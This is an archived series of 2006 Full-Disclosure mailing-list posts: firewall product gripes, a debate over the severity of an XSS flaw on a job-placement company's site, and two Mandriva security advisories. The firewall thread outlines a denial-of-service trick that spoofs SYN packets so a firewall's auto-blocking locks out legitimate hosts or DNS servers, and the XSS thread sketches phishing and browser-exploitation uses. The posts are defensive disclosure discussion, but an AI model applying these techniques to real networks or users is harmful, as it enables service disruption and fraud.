PROTECTED] On Behalf Of Nancy Kramer Sent: Friday, 20 January 2006 2:30 PM To: Stan Bubrouski; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Re: Re: PC Firewall Choices I admit I know nothing about firewalls but with ZA I have had to shut it down sometimes to go onto the internet. I have no idea why. I just can't get on and when I shut it down I can. That'd be a well known and never fixed bug I reported to Zonelabs some years back now. It has a feature to automatically lock internet connection after so many minutes of inactivity. The length of time can be changed by the user. What it REALLY did was cut off access to internet and any LAN you were on, isolating you entirely and never actually let go of it when the user was back at the keyboard. Exiting ZA let that go and internet and lan were restored. You have the option to turn that feature OFF but even that didn't stop the whole thing happening. So, about the only thing you could do was to set the auto lock as high as it could go and turn the feature off. It would still go off after that many minutes had passed (which I believe is 999 in the PRO version and 99 in the free version) and lock you out again but it was delayed by that much, at least. You CAN set certain programs to pass by its' lock, however. So, if you have some computers almost always chattering away on a distributed project but otherwise not touched, you could allow those programs to pass on even though, should you attempt to get out with a simple web browser (where it wasn't allowed to pass the lock), you cant. Saves some stuffing about on such machines and let's face it - the more free some company execs see, the more likely they are to use it. Surprising how many Windows based companies use free ZA. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- No virus found in this incoming message. Checked by AVG Anti-Virus. Version: 7.1.375 / Virus Database: 267.14.19/231 - Release Date: 1/16/2006 -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.1.375 / Virus Database: 267.14.19/231 - Release Date: 1/16/2006 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MBT Xss vulnerability
Reading over this again let me clarify why I'm curious about this: 1) Yes I'm aware someone could redirect someone to a form claiming to be by MBT to harvest information 2) I just don't see the relevence to this list (if we reported every XSS in every site, we could fill this list with 100s of message per day) Know what I mean? -sb On 1/20/06, Stan Bubrouski [EMAIL PROTECTED] wrote: Well I'm not going to talk about how XSS is useless because we all know it can be quite a serious problem. I think, and I don't know the guy so I can't be sure, the original dissenter to this post was pointing out that: What would you phish from a site that doesn't have any forms anyways? What would stealing a session cookie get you if the only dynamic content is a search function? I'm not saying XSS isn't important, I'm just wondering why this case is? -sb On 1/20/06, Jerome Athias [EMAIL PROTECTED] wrote: Hey guy, do you know something about XSS 1) Phishing? 2) encoded URL, UTF8...? 3) cookie steal? ... it'll not be difficult to reproduce a website and have an url difficult to understand for a basic user... sure it's harder to spoof the url in the browser... // Native.Code a écrit : What a lame vulnerability it is. If your POC redirects to another site (which is not MBT site), how someone will become victim and believe that he/she is doing business with MBT? Your post is yet another proof that FD is more and more inhibited by scipt kiddies. Get a life! - About FD: Speech is silver, but silence is gold /JA /https://www.securinfos.info/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MDKSA-2006:018 - Updated kernel packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:018 http://www.mandriva.com/security/ ___ Package : kernel Date: January 20, 2006 Affected: 2006.0 ___ Problem Description: A number of vulnerabilites have been corrected in the Linux kernel: A race condition in the 2.6 kernel could allow a local user to cause a DoS by triggering a core dump in one thread while another thread has a pending SIGSTOP (CVE-2005-3527). The ptrace functionality in 2.6 kernels prior to 2.6.14.2, using CLONE_THREAD, does not use the thread group ID to check whether it is attaching to itself, which could allow local users to cause a DoS (CVE-2005-3783). The auto-reap child process in 2.6 kernels prior to 2.6.15 include processes with ptrace attached, which leads to a dangling ptrace reference and allows local users to cause a crash (CVE-2005-3784). A locking problem in the POSIX timer cleanup handling on exit on kernels 2.6.10 to 2.6.14 when running on SMP systems, allows a local user to cause a deadlock involving process CPU timers (CVE-2005-3805). The IPv6 flowlabel handling code in 2.4 and 2.6 kernels prior to 2.4.32 and 2.6.14 modifes the wrong variable in certain circumstances, which allows local users to corrupt kernel memory or cause a crash by triggering a free of non-allocated memory (CVE-2005-3806). An integer overflow in 2.6.14 and earlier could allow a local user to cause a hang via 64-bit mmap calls that are not properly handled on a 32-bit system (CVE-2005-3808). As well, other bugfixes are included in this update: Fixes to swsup and HDA sound fixes (DMA buffer fixes, and fixes for the AD1986a codec, added support for Nvidia chipsets, and new model information for the Gigabyte K8N51). MCP51 forcedeth support has been added. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3527 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3783 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3784 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3805 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3806 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3808 ___ Updated Packages: Mandriva Linux 2006.0: c71acedddee438c177e44c59ace9231c 2006.0/RPMS/kernel-2.6.12.15mdk-1-1mdk.i586.rpm be94c46555066619429aba3c11e88c49 2006.0/RPMS/kernel-i586-up-1GB-2.6.12.15mdk-1-1mdk.i586.rpm 0506cd9f49c7fa8998ea9611c22fa33b 2006.0/RPMS/kernel-i686-up-4GB-2.6.12.15mdk-1-1mdk.i586.rpm bdc7d06043c6a98a1a9d1baee3bc47dd 2006.0/RPMS/kernel-smp-2.6.12.15mdk-1-1mdk.i586.rpm e4283335d3c3f2ff679dbaf672e2a288 2006.0/RPMS/kernel-source-2.6-2.6.12-15mdk.i586.rpm 4114739c58dd249e23afbde019ecf5e7 2006.0/RPMS/kernel-source-stripped-2.6-2.6.12-15mdk.i586.rpm f9f5deb668cfdaf90f66a50de54e8e54 2006.0/RPMS/kernel-xbox-2.6.12.15mdk-1-1mdk.i586.rpm bc0bade8d53184908296fac79fc07724 2006.0/RPMS/kernel-xen0-2.6.12.15mdk-1-1mdk.i586.rpm 8e4f4040d6b08d25cf323a451301cfe6 2006.0/RPMS/kernel-xenU-2.6.12.15mdk-1-1mdk.i586.rpm 786b6c30ae9c052de3a856d8933fe2fd 2006.0/SRPMS/kernel-2.6.12.15mdk-1-1mdk.src.rpm Mandriva Linux 2006.0/X86_64: cf1e06a1f851f40a4298b9d7f8135da5 x86_64/2006.0/RPMS/kernel-2.6.12.15mdk-1-1mdk.x86_64.rpm 00a15f173dc072f60c810b8d513987c9 x86_64/2006.0/RPMS/kernel-smp-2.6.12.15mdk-1-1mdk.x86_64.rpm b82e5e65bb03c557a3d1f6f3145a58cd x86_64/2006.0/RPMS/kernel-source-2.6-2.6.12-15mdk.x86_64.rpm 6ed321add133142fb3f597e004c9747f x86_64/2006.0/RPMS/kernel-source-stripped-2.6-2.6.12-15mdk.x86_64.rpm 786b6c30ae9c052de3a856d8933fe2fd x86_64/2006.0/SRPMS/kernel-2.6.12.15mdk-1-1mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFD0Q4XmqjQ0CJFipgRAr2hAJ91vhSFOR0gbGWyhJ1HEiMdKMaJqgCeLoyJ
Re: [Full-disclosure] MBT Xss vulnerability
Hii -Why would he be concerned? The problem is that most sites on theinternet suffer from XSS vulenrabilities, its just that nobody caresbecause there is nothing to gain from the sites. Nothing to gain you say? Yes. Let's take this site you posted about for example, Ididn't look over the entire site, but glancing I don't even seeanything which XSS would help you compromise. The site seemingly isall static content (minus a search, correct me if I'm wrong) with no e-mail portal, forums, or anything else that the XSS could beleveraged to gain access to. Since the site offeres no directservices (right?) what exactly could you trick people into doing here?The session cookie seems worthless since there's no login or anything... I have clearly mentioned inthe disclosure that this Xss is not harmful for server side but you can target a lot ofpeople, using this website. If you have completly read my disclosure mail, i have mentioned in the end that a lot of people seeking job can be targeted. I can say this because i know the value of this organisationfrompointof placements. Morever this organisation provides security solution to other companies. From the point of comapny's security everything is fine but from the point of its social image.. -Which would be meaningful if:A) this site were used by millions of peopleB) there was something worth compromising the site for (like access towebmail, personal information, etc...) I think what I'm missing here is why this particular XSS is useful inany way shape or form? Am I missing something significant aboutthis site? Do people trust it for something? As explained before , it can attract a lot of job-seekers. Millions of them. They trust this organisation. Even i do very much. -Isn't that what you are doing? Ijust posted a disclosure which i felt could be used by some bad guy to target innocent people.If anyone felt that this disclosure is some sort of spam and is really harmless, just discard it. Atleast i dont spam here by bashing someone else who has posted some disclosure. This bashing attitude reflects Lamer qualities and this discourages others from mailing disclosures. Hope i answered all your answers. Lets cut down the argument here. Regards; Santosh J On 1/20/06, Stan Bubrouski [EMAIL PROTECTED] wrote: On 1/19/06, MuNNa [EMAIL PROTECTED] wrote: Hahaha ... native code doesnt seem to understand the meaning of Xss and why it can be of security concern. Here not only url re-direction is possibleWhy would he be concerned?The problem is that most sites on the internet suffer from XSS vulenrabilities, its just that nobody caresbecause there is nothing to gain from the sites.Nothing to gain yousay?Yes.Let's take this site you posted about for example, Ididn't look over the entire site, but glancing I don't even see anything which XSS would help you compromise.The site seemingly isall static content (minus a search, correct me if I'm wrong) with noe-mail portal, forums, or anything else that the XSS could beleveraged to gain access to.Since the site offeres no direct services (right?) what exactly could you trick people into doing here?The session cookie seems worthless since there's no login oranything... but also execution of malicious _javascript_s is possible.Your Lame replyWhich would be meaningful if:A) this site were used by millions of peopleB) there was something worth compromising the site for (like access towebmail, personal information, etc...)I think what I'm missing here is why this particular XSS is useful in any way shape or form?Am I missing something significant aboutthis site?Do people trust it for something? makes me think that you are one of the following: 1.An employee of MBT criticising me in the interest of the company 'or' 2.A poor spammer who doesnt know anything but tries to shows-off as if he is the MASTER. If this is the case carry on with your spamming business and good luck for your future.Isn't that what you are doing? -sb Regards; Santosh J. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Personal firewalls.
Time to thrown my .02 cents in. Zone - Good product, though it requires much thought and proper configuration for successful installs. does not, always save your configurations settings when you shutdown. This I find occurs most often when you upgrade Zone from one version to another and not use the "clean install option." If this occurs you have 2 options. 1. re-install zone, utilizing the clean install option and then re-enter your rules. 2. do not re-install zone but when you have made firewall rules changes, exit out of the program after making the aforementioned changes, when Zone exits, not as part of a shutdown it seems to correctly flush the configuration to disk. Another issue with zone, is that they have not yet fixed the bug in the true vector engine. I can can cause true vector, to regularly crash out and leave the system unprotected from a remote client. I have notified Zone's engineers, specifically how this was done and to date no response from their side. To their credit, when this occurs now the system loses all network connectivity (with recent update.) and the VSMON service now restarts. So even though the bug in True Vector still exists they have worked around it so as to not leave your system completely vulnerable as in the 5.x versions. But other than this it is a good package, very flexible, and powerful though requiring a certain level of sophistication to configure it properly. However I do wish it had the feature that Sygate PRO has, which will blackhole a IP if it detects a ports scan coming to it. it then blocks all activity from the offending IP for approximately 10 minutes. It however had a similar problem to zone in that we could easily get the FW to crash out, however when it did crash out all connectivity was lost. To date this also has not been fixed. the other firewalls I've played with, all had their own set of feature issues, With Black Ice being the worst piece of Garbage, I have had my displeasure of ever installing. Just too damn easy to defeat. in all cases, I would recommend a firewall software, especially if you are on a laptop, and might ever be out on he wild wild internet without being behind a hardware firewall. Preferably something that will also check on programs attempting to make outbound connections. But I would not rely on just a software one either. And with hardware many users/companies make the same mistake, layering firewalls all of the same vendor/brand. So that in the event of an exploit weakens they're all penetrated. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MBT Xss vulnerability
in all honesty, XSS is a serious vector of attack. however, non-persistant XSS is a much less serious problem than is persistant XSS. Generally XSS is of no harm to the server side anyway. It can however be leveraged as the OP said, but would require a dedicated, pre-formed url string that needs to be presented to the user to be effective. IMHO the OP advisory should not have been posted, because of the non-persistant nature of the flaw at one dedicated site. Issues comes into play via persistant XSS, which is script that may be embedded in a web application, such as a guestbook, or comment section, where people would travel to on their own without the need of a direct link and then rendered upon visitation in the users browser. Further, in todays world of browser exploitation, cookie, session, and/or credential theft is not the only thing to be gainedand is often of minor importanceand information. What is bad is leveraging XSS as a vector for browser exploitation ( can we say IFRAME+WMF ), so you have a way, via XSS to COMPROMISE end users systems. While the OP does have a valid initial point and theory, 1.it is not persistant in nature 2. it is one site, and not a script used on many sites 3. it does require SE at some level to be effective 4. it should not have been posted to FD ( see points 1,2,3 ) my2bits, MW ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MBT Xss vulnerability
On 1/20/06, MuNNa [EMAIL PROTECTED] wrote: Hii -Why would he be concerned? The problem is that most sites on the internet suffer from XSS vulenrabilities, its just that nobody cares because there is nothing to gain from the sites. Nothing to gain you say? Yes. Let's take this site you posted about for example, I didn't look over the entire site, but glancing I don't even see anything which XSS would help you compromise. The site seemingly is all static content (minus a search, correct me if I'm wrong) with no e-mail portal, forums, or anything else that the XSS could be leveraged to gain access to. Since the site offeres no direct services (right?) what exactly could you trick people into doing here? The session cookie seems worthless since there's no login or anything... I have clearly mentioned in the disclosure that this Xss is not harmful for server side but you can target a lot of people, using this website. If you have completly read my disclosure mail, i have mentioned in the end that a lot of people seeking job can be targeted. I can say this because i know the value of this organisation from point of placements. Morever this organisation provides security solution to other companies. From the point of comapny's security everything is fine but from the point of its social image.. Okay. -Which would be meaningful if: A) this site were used by millions of people B) there was something worth compromising the site for (like access to webmail, personal information, etc...) I think what I'm missing here is why this particular XSS is useful in any way shape or form?Am I missing something significant about this site? Do people trust it for something? As explained before , it can attract a lot of job-seekers. Millions of them. They trust this organisation. Even i do very much. Okay see that's why I asked since this site is used by millions of people that actually answers my question. Thank you. -Isn't that what you are doing? I just posted a disclosure which i felt could be used by some bad guy to target innocent people.If anyone felt that this disclosure is some sort of spam and is really harmless, just discard it. Atleast i dont spam here by bashing someone else who has posted some disclosure. This bashing attitude reflects Lamer qualities and this discourages others from mailing disclosures. Yeah I actually felt bad after I wrote that line, I jsut didn't understand how his repsonse contributed to spam and yours didn't, know what I mean? Hope i answered all your answers. Lets cut down the argument here. You did, and thouroughly! I thank you! Regards; Santosh J You da man, Stan On 1/20/06, Stan Bubrouski [EMAIL PROTECTED] wrote: On 1/19/06, MuNNa [EMAIL PROTECTED] wrote: Hahaha ... native code doesnt seem to understand the meaning of Xss and why it can be of security concern. Here not only url re-direction is possible Why would he be concerned? The problem is that most sites on the internet suffer from XSS vulenrabilities, its just that nobody cares because there is nothing to gain from the sites. Nothing to gain you say? Yes. Let's take this site you posted about for example, I didn't look over the entire site, but glancing I don't even see anything which XSS would help you compromise. The site seemingly is all static content (minus a search, correct me if I'm wrong) with no e-mail portal, forums, or anything else that the XSS could be leveraged to gain access to. Since the site offeres no direct services (right?) what exactly could you trick people into doing here? The session cookie seems worthless since there's no login or anything... but also execution of malicious javascripts is possible.Your Lame reply Which would be meaningful if: A) this site were used by millions of people B) there was something worth compromising the site for (like access to webmail, personal information, etc...) I think what I'm missing here is why this particular XSS is useful in any way shape or form?Am I missing something significant about this site? Do people trust it for something? makes me think that you are one of the following: 1.An employee of MBT criticising me in the interest of the company 'or' 2.A poor spammer who doesnt know anything but tries to shows-off as if he is the MASTER. If this is the case carry on with your spamming business and good luck for your future. Isn't that what you are doing? -sb Regards; Santosh J. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MBT Xss vulnerability
On 1/20/06, Morning Wood [EMAIL PROTECTED] wrote: in all honesty, XSS is a serious vector of attack. however, non-persistant XSS is a much less serious problem than is persistant XSS. Generally XSS is of no harm to the server side anyway. It can however be leveraged as the OP said, but would require a dedicated, pre-formed url string that needs to be presented to the user to be effective. IMHO the OP advisory should not have been posted, because of the non-persistant nature of the flaw at one dedicated site. Unless that site is trusted by hundreds of thousands or millions of people, then something minor can be made to be much more serious. For instance, in this case someone could create a form for phishing purposes that looks like a job application and mail it to millions of people who think that its from MBT. Issues comes into play via persistant XSS, which is script that may be embedded in a web application, such as a guestbook, or comment section, where people would travel to on their own without the need of a direct link and then rendered upon visitation in the users browser. Further, in todays world of browser exploitation, cookie, session, and/or credential theft is not the only thing to be gained and is often of minor importance and information. What is bad is leveraging XSS as a vector for browser exploitation ( can we say IFRAME+WMF ), so you have a way, via XSS to COMPROMISE end users systems. While the OP does have a valid initial point and theory, 1. it is not persistant in nature 2. it is one site, and not a script used on many sites Yes thats what I was thinking, but apparently a lot of people use it, at least thats the gist I got. 3. it does require SE at some level to be effective 4. it should not have been posted to FD ( see points 1,2,3 ) This was my concern in previous replies. Why should XSS on one site be posted here, but as the list maintainer stated previously XSS in big sites like Google or Yahoo is pertinent to this list due to the large number of people they can affect. Assuming the author is correct about it possibly affecting millions of people then its relevence to this list is clearly satisfied. -sb my2bits, MW ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Personal firewalls.
However I do wish it had the feature that Sygate PRO has, which will blackhole a IP if it detects a ports scan coming to it. it then blocks all activity from the offending IP for approximately 10 minutes. Well, it's a feature if the probes are really coming from the computer Sygate PRO thinks they're coming from. Suppose X is running Sygate PRO and Y is a legitimate client connecting to a server running on X. Then Z comes along and sends a bunch of SYN packets to X, spoofed to have the source IP of Y, waits 10 minutes, and repeats ad infinitum. Now Y can never connect to X. This seems more like a DoS vulnerability than a feature to me. Am I missing something? -Eliah On 1/20/06, Soderland, Craig wrote: Time to thrown my .02 cents in. Zone - Good product, though it requires much thought and proper configuration for successful installs. does not, always save your configurations settings when you shutdown. This I find occurs most often when you upgrade Zone from one version to another and not use the clean install option. If this occurs you have 2 options. 1. re-install zone, utilizing the clean install option and then re-enter your rules. 2. do not re-install zone but when you have made firewall rules changes, exit out of the program after making the aforementioned changes, when Zone exits, not as part of a shutdown it seems to correctly flush the configuration to disk. Another issue with zone, is that they have not yet fixed the bug in the true vector engine. I can can cause true vector, to regularly crash out and leave the system unprotected from a remote client. I have notified Zone's engineers, specifically how this was done and to date no response from their side. To their credit, when this occurs now the system loses all network connectivity (with recent update.) and the VSMON service now restarts. So even though the bug in True Vector still exists they have worked around it so as to not leave your system completely vulnerable as in the 5.x versions. But other than this it is a good package, very flexible, and powerful though requiring a certain level of sophistication to configure it properly. However I do wish it had the feature that Sygate PRO has, which will blackhole a IP if it detects a ports scan coming to it. it then blocks all activity from the offending IP for approximately 10 minutes. It however had a similar problem to zone in that we could easily get the FW to crash out, however when it did crash out all connectivity was lost. To date this also has not been fixed. the other firewalls I've played with, all had their own set of feature issues, With Black Ice being the worst piece of Garbage, I have had my displeasure of ever installing. Just too damn easy to defeat. in all cases, I would recommend a firewall software, especially if you are on a laptop, and might ever be out on he wild wild internet without being behind a hardware firewall. Preferably something that will also check on programs attempting to make outbound connections. But I would not rely on just a software one either. And with hardware many users/companies make the same mistake, layering firewalls all of the same vendor/brand. So that in the event of an exploit weakens they're all penetrated. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re[2]: [Full-disclosure] Personal firewalls.
Dear Eliah Kagan, EK Then Z comes along and sends a EK bunch of SYN packets to X, spoofed to have the source IP of Y, waits EK 10 minutes, and repeats ad infinitum. Z sends spoofed packets coming from the DNS server of X even more interesting.. -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: Re[2]: [Full-disclosure] Personal firewalls.
Z sends spoofed packets coming from the DNS server of X even more interesting.. When Sygate PRO blackholes a host, does it block only unsolicited packets (bad), or does it block *all* incoming packets from that host (worse)? -Eliah On 1/20/06, Thierry Zoller [EMAIL PROTECTED] wrote: Dear Eliah Kagan, EK Then Z comes along and sends a EK bunch of SYN packets to X, spoofed to have the source IP of Y, waits EK 10 minutes, and repeats ad infinitum. Z sends spoofed packets coming from the DNS server of X even more interesting.. -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: Re[2]: [Full-disclosure] Personal firewalls.
Any self-respecting network administrator, (who knows what he/she is doing), would have planned for that And setup some kind of overideing ruleset, that will allways allow communiction to/from it's own resources. A.K.A, the BLACKHOLE / IP BANNING would be overiden for IP's resources, like that of it's DNS Servers. But, that could, too, be exploited. If Z spoofs packets using the ip of the DNS Server (the one that is not banned because of the overide or 'never ban these ips, etc') Would be allowed to send those packets, SYN Packet, etc, as was stated, ad infinitum. As, they say, no computer or server is ever, *TRULY*, secure - even with a software or hardware firwall, or 'voodoo-like' security measures. Digitalchaos (just my 2 cents) -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Thierry Zoller Sent: Friday, January 20, 2006 5:58 PM To: full-disclosure@lists.grok.org.uk Subject: Re[2]: [Full-disclosure] Personal firewalls. Dear Eliah Kagan, EK Then Z comes along and sends a EK bunch of SYN packets to X, spoofed to have the source IP of Y, waits EK 10 minutes, and repeats ad infinitum. Z sends spoofed packets coming from the DNS server of X even more interesting.. -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- No virus found in this incoming message. Checked by AVG Free Edition. Version: 7.1.375 / Virus Database: 267.14.21/236 - Release Date: 1/20/2006 -- No virus found in this outgoing message. Checked by AVG Free Edition. Version: 7.1.375 / Virus Database: 267.14.21/236 - Release Date: 1/20/2006 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Personal firewalls.
You are then saying don't buy your firewall bundled with your anti virus. Logically that makes sense. It seems though that most AV vendors sell a firewall with their deluxe packages maybe because they think you need one and it gives them a little extra revenue. I have dailup and no firewall on my desktop and so far so good. Haven't had to rebuild the system yet and I have had it since March 2001. Came close to getting it messed up when I had Norton but was saved by AVG Free. Currently I have my email on a server where they keep the server anti virus up to date. I have not seen a virus in email in months. I still need desktop anti virus but it sure does cut down on the malware that shows up on my desktop. Regards, Nancy Kramer At 03:28 PM 1/20/2006, Soderland, Craig wrote: And with hardware many users/companies make the same mistake, layering firewalls all of the same vendor/brand. So that in the event of an exploit weakens they're all penetrated. -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.1.375 / Virus Database: 267.14.19/231 - Release Date: 1/16/2006 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MDKSA-2006:019 - Updated kdelibs packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:019 http://www.mandriva.com/security/ ___ Package : kdelibs Date: January 20, 2006 Affected: 2006.0, Corporate 3.0 ___ Problem Description: A heap overflow vulnerability was discovered in kjs, the KDE JavaScript interpretter engine. An attacker could create a malicious web site that contained carefully crafted JavaScript code that could trigger the flaw and potentially lead to the arbitrary execution of code as the user visiting the site. The updated packages have been patched to correct this problem. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0019 ___ Updated Packages: Mandriva Linux 2006.0: 6d11e781a5112ab7d2c991df1bca4c0d 2006.0/RPMS/kdelibs-common-3.4.2-31.3.20060mdk.i586.rpm 09ddb324793a6af1e5bb55912896a9a1 2006.0/RPMS/kdelibs-devel-doc-3.4.2-31.3.20060mdk.i586.rpm 6211efda291f9327ed98d3aca442b1f0 2006.0/RPMS/libkdecore4-3.4.2-31.3.20060mdk.i586.rpm 77f643da674997a6ae38acd761f3016a 2006.0/RPMS/libkdecore4-devel-3.4.2-31.3.20060mdk.i586.rpm 57fb02e73896d75f28d9f9aad5f5dfef 2006.0/SRPMS/kdelibs-3.4.2-31.3.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 84b25eefbb6fa383dbc4ccf92c873f74 x86_64/2006.0/RPMS/kdelibs-common-3.4.2-31.3.20060mdk.x86_64.rpm c3e42fe27e73df2da68ba768f0dbee4c x86_64/2006.0/RPMS/kdelibs-devel-doc-3.4.2-31.3.20060mdk.x86_64.rpm a6a7258b0990a09b099e039f54db18bb x86_64/2006.0/RPMS/lib64kdecore4-3.4.2-31.3.20060mdk.x86_64.rpm 62a2e822dab43b67f7cdfb9258725d2b x86_64/2006.0/RPMS/lib64kdecore4-devel-3.4.2-31.3.20060mdk.x86_64.rpm 6211efda291f9327ed98d3aca442b1f0 x86_64/2006.0/RPMS/libkdecore4-3.4.2-31.3.20060mdk.i586.rpm 77f643da674997a6ae38acd761f3016a x86_64/2006.0/RPMS/libkdecore4-devel-3.4.2-31.3.20060mdk.i586.rpm 57fb02e73896d75f28d9f9aad5f5dfef x86_64/2006.0/SRPMS/kdelibs-3.4.2-31.3.20060mdk.src.rpm Corporate 3.0: e3b716c3fef88118742882a139d589fa corporate/3.0/RPMS/kdelibs-common-3.2-36.15.C30mdk.i586.rpm 439b0acb1afd62c8f894317ad5922557 corporate/3.0/RPMS/libkdecore4-3.2-36.15.C30mdk.i586.rpm 77e5302db914631a223c7fb6a55c623b corporate/3.0/RPMS/libkdecore4-devel-3.2-36.15.C30mdk.i586.rpm 8399789d3975218e919c7544cf4fff41 corporate/3.0/SRPMS/kdelibs-3.2-36.15.C30mdk.src.rpm Corporate 3.0/X86_64: 04d568123ae0f632020b16d7ca3c79b5 x86_64/corporate/3.0/RPMS/kdelibs-common-3.2-36.15.C30mdk.x86_64.rpm 6c0451aa188253c07d9865880cb32c35 x86_64/corporate/3.0/RPMS/lib64kdecore4-3.2-36.15.C30mdk.x86_64.rpm 22160903e03c77c575a84ed9ef045ac6 x86_64/corporate/3.0/RPMS/lib64kdecore4-devel-3.2-36.15.C30mdk.x86_64.rpm 439b0acb1afd62c8f894317ad5922557 x86_64/corporate/3.0/RPMS/libkdecore4-3.2-36.15.C30mdk.i586.rpm 8399789d3975218e919c7544cf4fff41 x86_64/corporate/3.0/SRPMS/kdelibs-3.2-36.15.C30mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFD0Wo/mqjQ0CJFipgRAmZ5AJwIj2pNBFllFW3SJGKuFTtDxynGqACg0D5Q gtPHEfoCPKr+iAPlyii2ugE= =6CJe -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/